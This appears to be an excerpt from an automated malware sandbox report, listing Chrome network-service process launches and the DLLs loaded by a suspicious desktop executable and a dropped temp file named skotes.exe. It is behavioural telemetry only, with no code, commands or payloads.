Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1988,i,16593288603214495399,11730275540552871039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2012,i,10262160878012687441,15301380062293127654,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1968,i,3968838028028287844,15257303702526662038,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1972,i,13595040883661267341,5298112090488421856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2000,i,2165972809307344740,441943955686262932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1976,i,11014613956716725374,17879268145922355351,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1932,i,3839464556416060848,13026013853573635163,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1992,i,7238726655923870739,5759593871076519028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1988,i,9243568103408200411,14083164291610540486,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1984,i,15419181765585057394,6670311027553153785,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2024,i,14402791647519130237,17028031831812843495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1172 --field-trial-handle=2012,i,5999604552990070426,13015335531134966904,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1916 --field-trial-handle=2028,i,14704702612634137022,13283822498721106839,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1980,i,13800168806641850337,1252832294211567749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1984,i,6342465718296439963,7063653370630127656,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1996,i,14624050743364290986,7834764246845110021,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1996,i,2440065999085773376,4668946962335946973,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2016,i,979502028839624058,13434839107830149959,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1992,i,8220830113635767741,8511822262946293777,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1968,i,17173762750527162096,5079444058244670986,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1156,i,5154185688367289602,11407614901677859174,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=692 --field-trial-handle=2012,i,5788619707603885448,5455322155689001163,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2004,i,13036272579540178643,1927237139647604030,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2008,i,3918962276335397993,18229504157229042942,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2000,i,12795265570595023803,2009076803051335294,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1972,i,10677569344053674716,7012595910923912148,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2016,i,6451084168294191247,3303557760454261359,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1980,i,1857441977012259282,17901089399641908308,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=1992,i,13675614276573810495,14474061813535694310,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,7487110070847316896,5582251863534710150,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1168 --field-trial-handle=2028,i,13790200691533269936,14390321029282639858,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=2044,i,12705238517774536685,12117524317393481054,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2008,i,418568306607350609,5560649611066257662,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1468 --field-trial-handle=1744,i,11295412607946737316,9054402318779687979,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2012,i,17020493693857119135,5398933278766730022,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2064,i,3078106045737069916,8196321467453170590,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2012,i,15081096063514957223,8890955275309698934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
